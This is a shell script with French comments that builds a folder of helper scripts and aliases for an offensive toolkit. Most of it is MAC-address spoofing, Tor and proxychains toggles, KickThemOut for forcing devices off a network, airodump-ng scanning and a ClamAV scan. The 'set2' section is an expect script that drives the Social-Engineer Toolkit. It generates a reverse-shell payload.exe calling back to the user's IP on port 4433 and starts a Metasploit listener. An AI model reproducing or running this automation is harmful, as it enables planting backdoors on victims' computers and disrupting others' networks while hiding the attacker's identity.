#Création de la Zone Scripts avec tous les Scripts#

cd "/$USERNAME"
mkdir Scripts
cd Scripts
touch kick Mac Macchanger.sh My_IP proxyon proxyoff set set2 tor2 Virus 
chmod +x -R /$USERNAME/Scripts

#Kickthemout
echo cd /$USERNAME/Scripts/kickthemout >> kick
echo python kickthemout.py >> kick
echo cd \~ >> kick

#Mac #Changer wlan0 si différent#
echo 'service network-manager stop ; sleep 5' >> Mac
echo 'ifconfig wlan0 down' >> Mac
echo 'macchanger -r -A wlan0 ; sleep 5' >> Mac
echo 'ifconfig wlan0 up ; sleep 5' >> Mac
echo 'service network-manager start' >> Mac

#Macchanger.sh #Changer wlan0 si différent#
echo '#!/bin/bash' >> Macchanger.sh
echo 'ifconfig wlan0 down' >> Macchanger.sh
echo 'sleep 2' >> Macchanger.sh
echo 'macchanger -r -A wlan0' >> Macchanger.sh
echo 'sleep 2' >> Macchanger.sh
echo 'ifconfig wlan0 up' >> Macchanger.sh

#My_IP
echo '#!/bin/bash' >> My_IP
echo ip\=\"\$\(ifconfig wlan0 \|sed -n \'2p\'\| awk \'\{print \$2\}\'\)\" >> My_IP
echo echo \$ip >> My_IP

#proxyon
echo service tor start >> proxyon
echo /etc/init.d/tor start >> proxyon
echo proxychains firefox www.duckduckgo.com >> proxyon

#proxyoff
echo service tor stop >> proxyoff
echo /etc/init.d/tor stop >> proxyoff

#set
echo '#!/bin/bash' >> set 
echo ip\=\"\$\(ifconfig wlan0 \|sed -n \'2p\'\| awk \'\{print \$2\}\'\)\" >> set
echo 'echo $ip > @ip' >> set
echo ./set2 >> set

#set2
echo '#!/usr/bin/expect' >> set2
echo set ip [exec cat @ip] >> set2

echo set timeout 5 >> set2

echo spawn \"setoolkit\" >> set2
echo set timeout 2 >> set2

echo expect \"set\>\" >> set2
echo send -- \"1\\r\" >> set2
echo set timeout 2 >> set2
echo expect \"set\>\" >> set2
echo send -- \"4\\r\" >> set2
echo set timeout 2 >> set2
echo expect \"set:payloads\>\" >> set2
echo send -- \"2\\r\" >> set2
echo set timeout 2 >> set2
echo expect \"\(LHOST\):\" >> set2
echo send -- \"\$ip\\r\" >> set2
echo set timeout 2 >> set2
echo expect \"reverse listener:\" >> set2
echo send -- \"4433\\r\" >> set2
echo set timeout 5 >> set2
echo expect \"\(yes/no\)\" >> set2
echo send -- \"yes\\r\" >> set2 
echo set timeout 10 >> set2
echo expect \"msf exploit\(handler\) \> \" >> set2
echo send -- \"exploit\" >> set2
echo set timeout 10 >> set2
echo system \"mv /root/.set//payload.exe /root/payload.exe\" >> set2
echo system \"rm @ip\" >> set2
echo interact >> set2

#tor2
echo cd /$USERNAME/Scripts/tor-browser_en-US/Browser >> tor2
echo ./start-tor-browser >> tor2

#Virus
echo echo Quelle repertoire voulez-vous scanner ? \(\/,\/etc\/apt\/,\/root\/,...\) >> Virus
echo read rep >> Virus
echo cd \$rep >> Virus
echo clamscan -r >> Virus
echo cd \~ >> Virus

#Alias

echo "alias proxyon='cd /$USERNAME/Scripts ; ./proxyon ; cd ~' " >> /$USERNAME/.bashrc
echo "alias proxyoff='cd /$USERNAME/Scripts ; ./proxyoff ; cd ~' " >> /$USERNAME/.bashrc
echo "alias tor2='cd /$USERNAME/Scripts ; ./tor2 ; cd ~' " >> /$USERNAME/.bashrc
echo "alias kick='cd /$USERNAME/Scripts ; ./kick ; cd ~' " >> /$USERNAME/.bashrc
echo "alias My_IP='cd /$USERNAME/Scripts ; ./My_IP ; cd ~' " >> /$USERNAME/.bashrc
echo "alias set2='cd /$USERNAME/Scripts ; ./set ; cd ~' " >> /$USERNAME/.bashrc
echo "alias scan='airodump-ng wlan0' " >> /$USERNAME/.bashrc
echo "alias virus='cd /$USERNAME/Scripts ; ./Virus ; cd ~' " >> /$USERNAME/.bashrc
